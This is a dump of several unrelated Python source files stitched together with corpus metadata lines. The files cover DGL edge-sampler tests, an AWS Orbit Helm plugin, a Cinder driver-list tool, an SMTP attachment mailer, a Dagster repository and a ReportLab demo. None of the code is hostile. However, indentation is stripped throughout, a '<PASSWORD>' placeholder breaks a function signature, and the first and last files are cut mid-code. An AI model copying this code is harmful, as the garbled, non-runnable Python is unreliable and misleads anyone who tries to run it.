for i, subg in enumerate(dgl.contrib.sampling.NeighborSampler(
g, 5, 3, num_hops=2, neighbor_type='in', num_workers=4)):
pass
def check_head_tail(g):
lsrc, ldst, leid = g.all_edges(form='all', order='eid')
lsrc = np.unique(F.asnumpy(lsrc))
head_nid = np.unique(F.asnumpy(g.head_nid))
assert len(head_nid) == len(g.head_nid)
np.testing.assert_equal(lsrc, head_nid)
ldst = np.unique(F.asnumpy(ldst))
tail_nid = np.unique(F.asnumpy(g.tail_nid))
assert len(tail_nid) == len(g.tail_nid)
np.testing.assert_equal(tail_nid, ldst)
def check_negative_sampler(mode, exclude_positive, neg_size):
g = generate_rand_graph(100)
num_edges = g.number_of_edges()
etype = np.random.randint(0, 10, size=g.number_of_edges(), dtype=np.int64)
g.edata['etype'] = F.copy_to(F.tensor(etype), F.cpu())
pos_gsrc, pos_gdst, pos_geid = g.all_edges(form='all', order='eid')
pos_map = {}
for i in range(len(pos_geid)):
pos_d = int(F.asnumpy(pos_gdst[i]))
pos_e = int(F.asnumpy(pos_geid[i]))
pos_map[(pos_d, pos_e)] = int(F.asnumpy(pos_gsrc[i]))
EdgeSampler = getattr(dgl.contrib.sampling, 'EdgeSampler')
# Test the homogeneous graph.
batch_size = 50
total_samples = 0
for pos_edges, neg_edges in EdgeSampler(g, batch_size,
negative_mode=mode,
reset=False,
neg_sample_size=neg_size,
exclude_positive=exclude_positive,
return_false_neg=True):
pos_lsrc, pos_ldst, pos_leid = pos_edges.all_edges(form='all', order='eid')
assert_array_equal(F.asnumpy(F.gather_row(pos_edges.parent_eid, pos_leid)),
F.asnumpy(g.edge_ids(F.gather_row(pos_edges.parent_nid, pos_lsrc),
F.gather_row(pos_edges.parent_nid, pos_ldst))))
neg_lsrc, neg_ldst, neg_leid = neg_edges.all_edges(form='all', order='eid')
neg_src = F.gather_row(neg_edges.parent_nid, neg_lsrc)
neg_dst = F.gather_row(neg_edges.parent_nid, neg_ldst)
neg_eid = F.gather_row(neg_edges.parent_eid, neg_leid)
for i in range(len(neg_eid)):
neg_d = int(F.asnumpy(neg_dst)[i])
neg_e = int(F.asnumpy(neg_eid)[i])
assert (neg_d, neg_e) in pos_map
if exclude_positive:
assert int(F.asnumpy(neg_src[i])) != pos_map[(neg_d, neg_e)]
check_head_tail(neg_edges)
pos_tails = F.gather_row(pos_edges.parent_nid, pos_edges.tail_nid)
neg_tails = F.gather_row(neg_edges.parent_nid, neg_edges.tail_nid)
pos_tails = np.sort(F.asnumpy(pos_tails))
neg_tails = np.sort(F.asnumpy(neg_tails))
np.testing.assert_equal(pos_tails, neg_tails)
exist = neg_edges.edata['false_neg']
if exclude_positive:
assert np.sum(F.asnumpy(exist) == 0) == len(exist)
else:
assert F.array_equal(g.has_edges_between(neg_src, neg_dst), exist)
total_samples += batch_size
assert total_samples <= num_edges
# check replacement = True
# with reset = False (default setting)
total_samples = 0
for pos_edges, neg_edges in EdgeSampler(g, batch_size,
replacement=True,
reset=False,
negative_mode=mode,
neg_sample_size=neg_size,
exclude_positive=exclude_positive,
return_false_neg=True):
_, _, pos_leid = pos_edges.all_edges(form='all', order='eid')
assert len(pos_leid) == batch_size
total_samples += len(pos_leid)
assert total_samples == num_edges
# check replacement = False
# with reset = False (default setting)
total_samples = 0
for pos_edges, neg_edges in EdgeSampler(g, batch_size,
replacement=False,
reset=False,
negative_mode=mode,
neg_sample_size=neg_size,
exclude_positive=exclude_positive,
return_false_neg=True):
_, _, pos_leid = pos_edges.all_edges(form='all', order='eid')
assert len(pos_leid) == batch_size
total_samples += len(pos_leid)
assert total_samples == num_edges
# check replacement = True
# with reset = True
total_samples = 0
max_samples = 2 * num_edges
for pos_edges, neg_edges in EdgeSampler(g, batch_size,
replacement=True,
reset=True,
negative_mode=mode,
neg_sample_size=neg_size,
exclude_positive=exclude_positive,
return_false_neg=True):
_, _, pos_leid = pos_edges.all_edges(form='all', order='eid')
assert len(pos_leid) <= batch_size
total_samples += len(pos_leid)
if (total_samples >= max_samples):
break
assert total_samples >= max_samples
# check replacement = False
# with reset = True
total_samples = 0
max_samples = 2 * num_edges
for pos_edges, neg_edges in EdgeSampler(g, batch_size,
replacement=False,
reset=True,
negative_mode=mode,
neg_sample_size=neg_size,
exclude_positive=exclude_positive,
return_false_neg=True):
_, _, pos_leid = pos_edges.all_edges(form='all', order='eid')
assert len(pos_leid) <= batch_size
total_samples += len(pos_leid)
if (total_samples >= max_samples):
break
assert total_samples >= max_samples
# Test the knowledge graph.
total_samples = 0
for _, neg_edges in EdgeSampler(g, batch_size,
negative_mode=mode,
reset=False,
neg_sample_size=neg_size,
exclude_positive=exclude_positive,
relations=g.edata['etype'],
return_false_neg=True):
neg_lsrc, neg_ldst, neg_leid = neg_edges.all_edges(form='all', order='eid')
neg_src = F.gather_row(neg_edges.parent_nid, neg_lsrc)
neg_dst = F.gather_row(neg_edges.parent_nid, neg_ldst)
neg_eid = F.gather_row(neg_edges.parent_eid, neg_leid)
exists = neg_edges.edata['false_neg']
neg_edges.edata['etype'] = F.gather_row(g.edata['etype'], neg_eid)
for i in range(len(neg_eid)):
u, v = F.asnumpy(neg_src[i]), F.asnumpy(neg_dst[i])
if g.has_edge_between(u, v):
eid = g.edge_id(u, v)
etype = g.edata['etype'][eid]
exist = neg_edges.edata['etype'][i] == etype
assert F.asnumpy(exists[i]) == F.asnumpy(exist)
total_samples += batch_size
assert total_samples <= num_edges
def check_weighted_negative_sampler(mode, exclude_positive, neg_size):
g = generate_rand_graph(100)
num_edges = g.number_of_edges()
num_nodes = g.number_of_nodes()
edge_weight = F.copy_to(F.tensor(np.full((num_edges,), 1, dtype=np.float32)), F.cpu())
node_weight = F.copy_to(F.tensor(np.full((num_nodes,), 1, dtype=np.float32)), F.cpu())
etype = np.random.randint(0, 10, size=num_edges, dtype=np.int64)
g.edata['etype'] = F.copy_to(F.tensor(etype), F.cpu())
pos_gsrc, pos_gdst, pos_geid = g.all_edges(form='all', order='eid')
pos_map = {}
for i in range(len(pos_geid)):
pos_d = int(F.asnumpy(pos_gdst[i]))
pos_e = int(F.asnumpy(pos_geid[i]))
pos_map[(pos_d, pos_e)] = int(F.asnumpy(pos_gsrc[i]))
EdgeSampler = getattr(dgl.contrib.sampling, 'EdgeSampler')
# Correctness check
# Test the homogeneous graph.
batch_size = 50
    # Test the homogeneous graph with edge weight provided.
total_samples = 0
for pos_edges, neg_edges in EdgeSampler(g, batch_size,
reset=False,
edge_weight=edge_weight,
negative_mode=mode,
neg_sample_size=neg_size,
exclude_positive=exclude_positive,
return_false_neg=True):
pos_lsrc, pos_ldst, pos_leid = pos_edges.all_edges(form='all', order='eid')
assert_array_equal(F.asnumpy(F.gather_row(pos_edges.parent_eid, pos_leid)),
F.asnumpy(g.edge_ids(F.gather_row(pos_edges.parent_nid, pos_lsrc),
F.gather_row(pos_edges.parent_nid, pos_ldst))))
neg_lsrc, neg_ldst, neg_leid = neg_edges.all_edges(form='all', order='eid')
neg_src = F.gather_row(neg_edges.parent_nid, neg_lsrc)
neg_dst = F.gather_row(neg_edges.parent_nid, neg_ldst)
neg_eid = F.gather_row(neg_edges.parent_eid, neg_leid)
for i in range(len(neg_eid)):
neg_d = int(F.asnumpy(neg_dst[i]))
neg_e = int(F.asnumpy(neg_eid[i]))
assert (neg_d, neg_e) in pos_map
if exclude_positive:
assert int(F.asnumpy(neg_src[i])) != pos_map[(neg_d, neg_e)]
check_head_tail(neg_edges)
pos_tails = F.gather_row(pos_edges.parent_nid, pos_edges.tail_nid)
neg_tails = F.gather_row(neg_edges.parent_nid, neg_edges.tail_nid)
pos_tails = np.sort(F.asnumpy(pos_tails))
neg_tails = np.sort(F.asnumpy(neg_tails))
np.testing.assert_equal(pos_tails, neg_tails)
exist = neg_edges.edata['false_neg']
if exclude_positive:
assert np.sum(F.asnumpy(exist) == 0) == len(exist)
else:
assert F.array_equal(g.has_edges_between(neg_src, neg_dst), exist)
total_samples += batch_size
assert total_samples <= num_edges
    # Test the knowledge graph with edge weight provided.
total_samples = 0
for pos_edges, neg_edges in EdgeSampler(g, batch_size,
reset=False,
edge_weight=edge_weight,
negative_mode=mode,
neg_sample_size=neg_size,
exclude_positive=exclude_positive,
relations=g.edata['etype'],
return_false_neg=True):
neg_lsrc, neg_ldst, neg_leid = neg_edges.all_edges(form='all', order='eid')
neg_src = F.gather_row(neg_edges.parent_nid, neg_lsrc)
neg_dst = F.gather_row(neg_edges.parent_nid, neg_ldst)
neg_eid = F.gather_row(neg_edges.parent_eid, neg_leid)
exists = neg_edges.edata['false_neg']
neg_edges.edata['etype'] = F.gather_row(g.edata['etype'], neg_eid)
for i in range(len(neg_eid)):
u, v = F.asnumpy(neg_src[i]), F.asnumpy(neg_dst[i])
if g.has_edge_between(u, v):
eid = g.edge_id(u, v)
etype = g.edata['etype'][eid]
exist = neg_edges.edata['etype'][i] == etype
assert F.asnumpy(exists[i]) == F.asnumpy(exist)
total_samples += batch_size
assert total_samples <= num_edges
    # Test the knowledge graph with edge/node weight provided.
total_samples = 0
for pos_edges, neg_edges in EdgeSampler(g, batch_size,
reset=False,
edge_weight=edge_weight,
node_weight=node_weight,
negative_mode=mode,
neg_sample_size=neg_size,
exclude_positive=exclude_positive,
relations=g.edata['etype'],
return_false_neg=True):
neg_lsrc, neg_ldst, neg_leid = neg_edges.all_edges(form='all', order='eid')
neg_src = F.gather_row(neg_edges.parent_nid, neg_lsrc)
neg_dst = F.gather_row(neg_edges.parent_nid, neg_ldst)
neg_eid = F.gather_row(neg_edges.parent_eid, neg_leid)
exists = neg_edges.edata['false_neg']
neg_edges.edata['etype'] = F.gather_row(g.edata['etype'], neg_eid)
for i in range(len(neg_eid)):
u, v = F.asnumpy(neg_src[i]), F.asnumpy(neg_dst[i])
if g.has_edge_between(u, v):
eid = g.edge_id(u, v)
etype = g.edata['etype'][eid]
exist = neg_edges.edata['etype'][i] == etype
assert F.asnumpy(exists[i]) == F.asnumpy(exist)
total_samples += batch_size
assert total_samples <= num_edges
    # check replacement = True with pos edges non-uniform sample
# with reset = False
total_samples = 0
for pos_edges, neg_edges in EdgeSampler(g, batch_size,
replacement=True,
reset=False,
edge_weight=edge_weight,
negative_mode=mode,
neg_sample_size=neg_size,
exclude_positive=exclude_positive,
return_false_neg=True):
_, _, pos_leid = pos_edges.all_edges(form='all', order='eid')
assert len(pos_leid) == batch_size
total_samples += len(pos_leid)
assert total_samples == num_edges
    # check replacement = True with pos edges non-uniform sample
# with reset = True
total_samples = 0
max_samples = 4 * num_edges
for pos_edges, neg_edges in EdgeSampler(g, batch_size,
replacement=True,
reset=True,
edge_weight=edge_weight,
negative_mode=mode,
neg_sample_size=neg_size,
exclude_positive=exclude_positive,
return_false_neg=True):
_, _, pos_leid = pos_edges.all_edges(form='all', order='eid')
assert len(pos_leid) == batch_size
total_samples += len(pos_leid)
if total_samples >= max_samples:
break
assert total_samples == max_samples
    # check replacement = False with pos/neg edges non-uniform sample
# reset = False
total_samples = 0
for pos_edges, neg_edges in EdgeSampler(g, batch_size,
replacement=False,
reset=False,
edge_weight=edge_weight,
node_weight=node_weight,
negative_mode=mode,
neg_sample_size=neg_size,
exclude_positive=exclude_positive,
relations=g.edata['etype'],
return_false_neg=True):
_, _, pos_leid = pos_edges.all_edges(form='all', order='eid')
assert len(pos_leid) == batch_size
total_samples += len(pos_leid)
assert total_samples == num_edges
    # check replacement = False with pos/neg edges non-uniform sample
# reset = True
total_samples = 0
for pos_edges, neg_edges in EdgeSampler(g, batch_size,
replacement=False,
reset=True,
edge_weight=edge_weight,
node_weight=node_weight,
negative_mode=mode,
neg_sample_size=neg_size,
exclude_positive=exclude_positive,
relations=g.edata['etype'],
return_false_neg=True):
_, _, pos_leid = pos_edges.all_edges(form='all', order='eid')
assert len(pos_leid) == batch_size
total_samples += len(pos_leid)
if total_samples >= max_samples:
break
assert total_samples == max_samples
# Check Rate
dgl.random.seed(0)
g = generate_rand_graph(1000)
num_edges = g.number_of_edges()
num_nodes = g.number_of_nodes()
edge_weight = F.copy_to(F.tensor(np.full((num_edges,), 1, dtype=np.float32)), F.cpu())
edge_weight[0] = F.sum(edge_weight, dim=0)
node_weight = F.copy_to(F.tensor(np.full((num_nodes,), 1, dtype=np.float32)), F.cpu())
node_weight[-1] = F.sum(node_weight, dim=0) / 200
etype = np.random.randint(0, 20, size=num_edges, dtype=np.int64)
g.edata['etype'] = F.copy_to(F.tensor(etype), F.cpu())
# Test w/o node weight.
max_samples = num_edges // 5
total_samples = 0
    # Test the knowledge graph with edge weight provided.
edge_sampled = np.full((num_edges,), 0, dtype=np.int32)
node_sampled = np.full((num_nodes,), 0, dtype=np.int32)
for pos_edges, neg_edges in EdgeSampler(g, batch_size,
replacement=True,
edge_weight=edge_weight,
shuffle=True,
negative_mode=mode,
neg_sample_size=neg_size,
exclude_positive=False,
relations=g.edata['etype'],
return_false_neg=True):
_, _, pos_leid = pos_edges.all_edges(form='all', order='eid')
neg_lsrc, neg_ldst, _ = neg_edges.all_edges(form='all', order='eid')
if 'head' in mode:
neg_src = neg_edges.parent_nid[neg_lsrc]
np.add.at(node_sampled, F.asnumpy(neg_src), 1)
else:
neg_dst = neg_edges.parent_nid[neg_ldst]
np.add.at(node_sampled, F.asnumpy(neg_dst), 1)
np.add.at(edge_sampled, F.asnumpy(pos_edges.parent_eid[pos_leid]), 1)
total_samples += batch_size
if total_samples > max_samples:
break
# Check rate here
edge_rate_0 = edge_sampled[0] / edge_sampled.sum()
edge_tail_half_cnt = edge_sampled[edge_sampled.shape[0] // 2:-1].sum()
edge_rate_tail_half = edge_tail_half_cnt / edge_sampled.sum()
assert np.allclose(edge_rate_0, 0.5, atol=0.05)
assert np.allclose(edge_rate_tail_half, 0.25, atol=0.05)
node_rate_0 = node_sampled[0] / node_sampled.sum()
node_tail_half_cnt = node_sampled[node_sampled.shape[0] // 2:-1].sum()
node_rate_tail_half = node_tail_half_cnt / node_sampled.sum()
assert node_rate_0 < 0.02
assert np.allclose(node_rate_tail_half, 0.5, atol=0.02)
# Test the knowledge graph with edge/node weight provied.
edge_sampled = np.full((num_edges,), 0, dtype=np.int32)
node_sampled = np.full((num_nodes,), 0, dtype=np.int32)
total_samples = 0
for pos_edges, neg_edges in EdgeSampler(g, batch_size,
replacement=True,
edge_weight=edge_weight,
node_weight=node_weight,
shuffle=True,
negative_mode=mode,
neg_sample_size=neg_size,
exclude_positive=False,
relations=g.edata['etype'],
return_false_neg=True):
_, _, pos_leid = pos_edges.all_edges(form='all', order='eid')
neg_lsrc, neg_ldst, _ = neg_edges.all_edges(form='all', order='eid')
if 'head' in mode:
neg_src = F.gather_row(neg_edges.parent_nid, neg_lsrc)
np.add.at(node_sampled, F.asnumpy(neg_src), 1)
else:
neg_dst = F.gather_row(neg_edges.parent_nid, neg_ldst)
np.add.at(node_sampled, F.asnumpy(neg_dst), 1)
np.add.at(edge_sampled, F.asnumpy(pos_edges.parent_eid[pos_leid]), 1)
total_samples += batch_size
if total_samples > max_samples:
break
# Check rate here
edge_rate_0 = edge_sampled[0] / edge_sampled.sum()
edge_tail_half_cnt = edge_sampled[edge_sampled.shape[0] // 2:-1].sum()
edge_rate_tail_half = edge_tail_half_cnt / edge_sampled.sum()
assert np.allclose(edge_rate_0, 0.5, atol=0.05)
assert np.allclose(edge_rate_tail_half, 0.25, atol=0.05)
node_rate = node_sampled[-1] / node_sampled.sum()
node_rate_a = np.average(node_sampled[:50]) / node_sampled.sum()
node_rate_b = np.average(node_sampled[50:100]) / node_sampled.sum()
# As neg sampling does not contain duplicate nodes,
    # this test allows some acceptable variation in the sample rate.
assert np.allclose(node_rate, node_rate_a * 5, atol=0.002)
assert np.allclose(node_rate_a, node_rate_b, atol=0.0002)
def check_positive_edge_sampler():
g = generate_rand_graph(1000)
num_edges = g.number_of_edges()
edge_weight = F.copy_to(F.tensor(np.full((num_edges,), 1, dtype=np.float32)), F.cpu())
edge_weight[num_edges-1] = num_edges ** 3
EdgeSampler = getattr(dgl.contrib.sampling, 'EdgeSampler')
# Correctness check
# Test the homogeneous graph.
batch_size = 128
edge_sampled = np.full((num_edges,), 0, dtype=np.int32)
for pos_edges in EdgeSampler(g, batch_size,
reset=False,
edge_weight=edge_weight):
_, _, pos_leid = pos_edges.all_edges(form='all', order='eid')
np.add.at(edge_sampled, F.asnumpy(pos_edges.parent_eid[pos_leid]), 1)
truth = np.full((num_edges,), 1, dtype=np.int32)
edge_sampled = edge_sampled[:num_edges]
assert np.array_equal(truth, edge_sampled)
edge_sampled = np.full((num_edges,), 0, dtype=np.int32)
for pos_edges in EdgeSampler(g, batch_size,
reset=False,
shuffle=True,
edge_weight=edge_weight):
_, _, pos_leid = pos_edges.all_edges(form='all', order='eid')
np.add.at(edge_sampled, F.asnumpy(pos_edges.parent_eid[pos_leid]), 1)
truth = np.full((num_edges,), 1, dtype=np.int32)
edge_sampled = edge_sampled[:num_edges]
assert np.array_equal(truth, edge_sampled)
@unittest.skipIf(dgl.backend.backend_name == "tensorflow", reason="TF doesn't support item assignment")
def test_negative_sampler():
check_negative_sampler('chunk-head', False, 10)
check_negative_sampler('head', True, 10)
check_negative_sampler('head', False, 10)
check_weighted_negative_sampler('chunk-head', False, 10)
check_weighted_negative_sampler('head', True, 10)
check_weighted_negative_sampler('head', False, 10)
check_positive_edge_sampler()
#disable this check for now. It might take too long time.
#check_negative_sampler('head', False, 100)
if __name__ == '__main__':
test_create_full()
test_1neighbor_sampler_all()
test_10neighbor_sampler_all()
test_1neighbor_sampler()
test_10neighbor_sampler()
test_layer_sampler()
test_nonuniform_neighbor_sampler()
test_setseed()
test_negative_sampler()
| 2.375 | 2 |
plugins/voila/voila/__init__.py | srinivasreddych/aws-orbit-workbench | 94 | 6969 | # Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
from typing import TYPE_CHECKING, Any, Dict, Optional
import aws_orbit
from aws_orbit.plugins import hooks
from aws_orbit.remote_files import helm
if TYPE_CHECKING:
from aws_orbit.models.context import Context, TeamContext
_logger: logging.Logger = logging.getLogger("aws_orbit")
CHART_PATH = os.path.join(os.path.dirname(__file__))
@hooks.deploy
def deploy(
plugin_id: str,
context: "Context",
team_context: "TeamContext",
parameters: Dict[str, Any],
) -> None:
_logger.debug("Team Env name: %s | Team name: %s", context.name, team_context.name)
plugin_id = plugin_id.replace("_", "-")
_logger.debug("plugin_id: %s", plugin_id)
chart_path = helm.create_team_charts_copy(team_context=team_context, path=CHART_PATH, target_path=plugin_id)
vars: Dict[str, Optional[str]] = dict(
team=team_context.name,
region=context.region,
account_id=context.account_id,
env_name=context.name,
restart_policy=parameters["restartPolicy"] if "restartPolicy" in parameters else "Always",
path=parameters["path"] if "path" in parameters else "/home/jovyan/shared/voila",
options=parameters["options"] if "options" in parameters else "",
plugin_id=plugin_id,
toolkit_s3_bucket=context.toolkit.s3_bucket,
image_pull_policy="Always" if aws_orbit.__version__.endswith(".dev0") else "IfNotPresent",
image=parameters["image"] if "image" in parameters else team_context.final_image_address,
sts_ep="legacy" if context.networking.data.internet_accessible else "regional",
)
repo_location = team_context.team_helm_repository
if repo_location:
repo = team_context.name
helm.add_repo(repo=repo, repo_location=repo_location)
chart_name, chart_version, chart_package = helm.package_chart(repo=repo, chart_path=chart_path, values=vars)
helm.install_chart(
repo=repo,
namespace=team_context.name,
name=f"{team_context.name}-{plugin_id}",
chart_name=chart_name,
chart_version=chart_version,
)
@hooks.destroy
def destroy(
plugin_id: str,
context: "Context",
team_context: "TeamContext",
parameters: Dict[str, Any],
) -> None:
_logger.debug(
"Delete Plugin %s of Team Env name: %s | Team name: %s",
plugin_id,
context.name,
team_context.name,
)
helm.uninstall_chart(f"{team_context.name}-{plugin_id}", namespace=team_context.name)
| 1.664063 | 2 |
tools/generate_driver_list.py | aarunsai81/netapp | 11 | 6970 | #! /usr/bin/env python
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Generate list of cinder drivers"""
import argparse
import os
from cinder.interface import util
parser = argparse.ArgumentParser(prog="generate_driver_list")
parser.add_argument("--format", default='str', choices=['str', 'dict'],
help="Output format type")
# Keep backwards compatibility with the gate-docs test
# The tests pass ['docs'] on the cmdln, but it's never been used.
parser.add_argument("output_list", default=None, nargs='?')
CI_WIKI_ROOT = "https://wiki.openstack.org/wiki/ThirdPartySystems/"
class Output(object):
def __init__(self, base_dir, output_list):
# At this point we don't care what was passed in, just a trigger
# to write this out to the doc tree for now
self.driver_file = None
if output_list:
self.driver_file = open(
'%s/doc/source/drivers.rst' % base_dir, 'w+')
self.driver_file.write('===================\n')
self.driver_file.write('Available Drivers\n')
self.driver_file.write('===================\n\n')
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
if self.driver_file:
self.driver_file.close()
def write(self, text):
if self.driver_file:
self.driver_file.write('%s\n' % text)
else:
print(text)
def format_description(desc, output):
desc = desc or '<None>'
lines = desc.rstrip('\n').split('\n')
for line in lines:
output.write(' %s' % line)
def print_drivers(drivers, config_name, output):
for driver in sorted(drivers, key=lambda x: x.class_fqn):
output.write(driver.class_name)
output.write('-' * len(driver.class_name))
if driver.version:
output.write('* Version: %s' % driver.version)
output.write('* %s=%s' % (config_name, driver.class_fqn))
if driver.ci_wiki_name:
output.write('* CI info: %s%s' % (CI_WIKI_ROOT,
driver.ci_wiki_name))
output.write('* Description:')
format_description(driver.desc, output)
output.write('')
output.write('')
def output_str(cinder_root, args):
with Output(cinder_root, args.output_list) as output:
output.write('Volume Drivers')
output.write('==============')
print_drivers(util.get_volume_drivers(), 'volume_driver', output)
output.write('Backup Drivers')
output.write('==============')
print_drivers(util.get_backup_drivers(), 'backup_driver', output)
output.write('FC Zone Manager Drivers')
output.write('=======================')
print_drivers(util.get_fczm_drivers(), 'zone_driver', output)
def collect_driver_info(driver):
"""Build the dictionary that describes this driver."""
info = {'name': driver.class_name,
'version': driver.version,
'fqn': driver.class_fqn,
'description': driver.desc,
'ci_wiki_name': driver.ci_wiki_name}
return info
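# Example of the dictionary produced for one driver (all values are illustrative only):
#   {'name': 'LVMVolumeDriver',
#    'version': '3.0.0',
#    'fqn': 'cinder.volume.drivers.lvm.LVMVolumeDriver',
#    'description': '...',
#    'ci_wiki_name': None}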
def output_dict():
import pprint
driver_list = []
drivers = util.get_volume_drivers()
for driver in drivers:
driver_list.append(collect_driver_info(driver))
pprint.pprint(driver_list)
def main():
tools_dir = os.path.dirname(os.path.abspath(__file__))
cinder_root = os.path.dirname(tools_dir)
cur_dir = os.getcwd()
os.chdir(cinder_root)
args = parser.parse_args()
try:
if args.format == 'str':
output_str(cinder_root, args)
elif args.format == 'dict':
output_dict()
finally:
os.chdir(cur_dir)
if __name__ == '__main__':
main()
| 2.296875 | 2 |
Disp_pythonScript.py | maniegley/python | 1 | 6971 | <gh_stars>1-10
import sys
f = open("/home/vader/Desktop/test.py", "r")
# read the whole file
python_script = f.read()
print(python_script)
| 2.078125 | 2 |
email_file.py | grussr/email-file-attachment | 0 | 6972 | import smtplib
import argparse
from os.path import basename
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.utils import COMMASPACE, formatdate
import configparser
import json
def send_mail(send_from, send_to, subject, text, files=None,
server="127.0.0.1", use_ssl=False, username=None, password=<PASSWORD>):
assert isinstance(send_to, list)
msg = MIMEMultipart()
msg['From'] = send_from
msg['To'] = COMMASPACE.join(send_to)
msg['Date'] = formatdate(localtime=True)
msg['Subject'] = subject
msg.attach(MIMEText(text))
for f in files or []:
with open(f, "rb") as fil:
part = MIMEApplication(
fil.read(),
Name=basename(f)
)
# After the file is closed
part['Content-Disposition'] = 'attachment; filename="%s"' % basename(f)
msg.attach(part)
    print(server)
if use_ssl == True:
smtp = smtplib.SMTP_SSL(server)
else:
smtp = smtplib.SMTP(server)
if username != None and username != '':
smtp.login(username, password)
smtp.sendmail(send_from, send_to, msg.as_string())
smtp.close()
parser = argparse.ArgumentParser()
parser.add_argument('attachment')
args = parser.parse_args()
attachpath = args.attachment
config = configparser.ConfigParser()
config.read('email_file.ini')
email_from = config['DEFAULT']['From']
email_to_list = json.loads(config['DEFAULT']['To'])
email_subject = config['DEFAULT']['Subject']
email_body = config['DEFAULT']['Body']
email_server = config['DEFAULT']['Server']
email_server_ssl = bool(config['DEFAULT']['Server_SSL'])
email_server_username = config['DEFAULT']['Server_Username']
email_server_password = config['DEFAULT']['Server_Password']
send_mail(email_from, email_to_list, email_subject, email_body, [attachpath], email_server, email_server_ssl, email_server_username, email_server_password)
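# Example layout of email_file.ini expected by the code above (illustrative values only):
#   [DEFAULT]
#   From = sender@example.com
#   To = ["recipient@example.com"]
#   Subject = File attached
#   Body = Please find the file attached.
#   Server = smtp.example.com
#   Server_SSL =
#   Server_Username =
#   Server_Password =
# Note: To must be a JSON list because it is parsed with json.loads(), and Server_SSL is
# read with bool(), so any non-empty string (including "False") enables SSL here.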
| 2.890625 | 3 |
logs/constants.py | gonzatorte/sw-utils | 0 | 6973 | <gh_stars>0
import logging
TRACE_LVL = int( (logging.DEBUG + logging.INFO) / 2 )
| 1.328125 | 1 |
examples/simple_lakehouse/simple_lakehouse/repo.py | dbatten5/dagster | 2 | 6974 | <gh_stars>1-10
from dagster import repository
from simple_lakehouse.pipelines import simple_lakehouse_pipeline
@repository
def simple_lakehouse():
return [simple_lakehouse_pipeline]
| 1.375 | 1 |
demos/odyssey/dodyssey.py | steingabelgaard/reportlab | 55 | 6975 | <filename>demos/odyssey/dodyssey.py<gh_stars>10-100
#Copyright ReportLab Europe Ltd. 2000-2017
#see license.txt for license details
__version__='3.3.0'
__doc__=''
#REPORTLAB_TEST_SCRIPT
import sys, copy, os
from reportlab.platypus import *
_NEW_PARA=os.environ.get('NEW_PARA','0')[0] in ('y','Y','1')
_REDCAP=int(os.environ.get('REDCAP','0'))
_CALLBACK=os.environ.get('CALLBACK','0')[0] in ('y','Y','1')
if _NEW_PARA:
def Paragraph(s,style):
from rlextra.radxml.para import Paragraph as PPPP
return PPPP(s,style)
from reportlab.lib.units import inch
from reportlab.lib.styles import getSampleStyleSheet
from reportlab.lib.enums import TA_LEFT, TA_RIGHT, TA_CENTER, TA_JUSTIFY
import reportlab.rl_config
reportlab.rl_config.invariant = 1
styles = getSampleStyleSheet()
Title = "The Odyssey"
Author = "Homer"
def myTitlePage(canvas, doc):
canvas.saveState()
canvas.restoreState()
def myLaterPages(canvas, doc):
canvas.saveState()
canvas.setFont('Times-Roman',9)
canvas.drawString(inch, 0.75 * inch, "Page %d" % doc.page)
canvas.restoreState()
def go():
def myCanvasMaker(fn,**kw):
from reportlab.pdfgen.canvas import Canvas
canv = Canvas(fn,**kw)
# attach our callback to the canvas
canv.myOnDrawCB = myOnDrawCB
return canv
doc = BaseDocTemplate('dodyssey.pdf',showBoundary=0)
#normal frame as for SimpleFlowDocument
frameT = Frame(doc.leftMargin, doc.bottomMargin, doc.width, doc.height, id='normal')
#Two Columns
frame1 = Frame(doc.leftMargin, doc.bottomMargin, doc.width/2-6, doc.height, id='col1')
frame2 = Frame(doc.leftMargin+doc.width/2+6, doc.bottomMargin, doc.width/2-6,
doc.height, id='col2')
doc.addPageTemplates([PageTemplate(id='First',frames=frameT, onPage=myTitlePage),
PageTemplate(id='OneCol',frames=frameT, onPage=myLaterPages),
PageTemplate(id='TwoCol',frames=[frame1,frame2], onPage=myLaterPages),
])
doc.build(Elements,canvasmaker=myCanvasMaker)
Elements = []
ChapterStyle = copy.deepcopy(styles["Heading1"])
ChapterStyle.alignment = TA_CENTER
ChapterStyle.fontsize = 14
InitialStyle = copy.deepcopy(ChapterStyle)
InitialStyle.fontsize = 16
InitialStyle.leading = 20
PreStyle = styles["Code"]
def newPage():
Elements.append(PageBreak())
chNum = 0
def myOnDrawCB(canv,kind,label):
print('myOnDrawCB(%s)'%kind, 'Page number=', canv.getPageNumber(), 'label value=', label)
def chapter(txt, style=ChapterStyle):
global chNum
Elements.append(NextPageTemplate('OneCol'))
newPage()
chNum += 1
if _NEW_PARA or not _CALLBACK:
Elements.append(Paragraph(txt, style))
else:
Elements.append(Paragraph(('foo<onDraw name="myOnDrawCB" label="chap %d"/> '%chNum)+txt, style))
Elements.append(Spacer(0.2*inch, 0.3*inch))
if useTwoCol:
Elements.append(NextPageTemplate('TwoCol'))
def fTitle(txt,style=InitialStyle):
Elements.append(Paragraph(txt, style))
ParaStyle = copy.deepcopy(styles["Normal"])
ParaStyle.spaceBefore = 0.1*inch
if 'right' in sys.argv:
ParaStyle.alignment = TA_RIGHT
elif 'left' in sys.argv:
ParaStyle.alignment = TA_LEFT
elif 'justify' in sys.argv:
ParaStyle.alignment = TA_JUSTIFY
elif 'center' in sys.argv or 'centre' in sys.argv:
ParaStyle.alignment = TA_CENTER
else:
ParaStyle.alignment = TA_JUSTIFY
useTwoCol = 'notwocol' not in sys.argv
def spacer(inches):
Elements.append(Spacer(0.1*inch, inches*inch))
def p(txt, style=ParaStyle):
if _REDCAP:
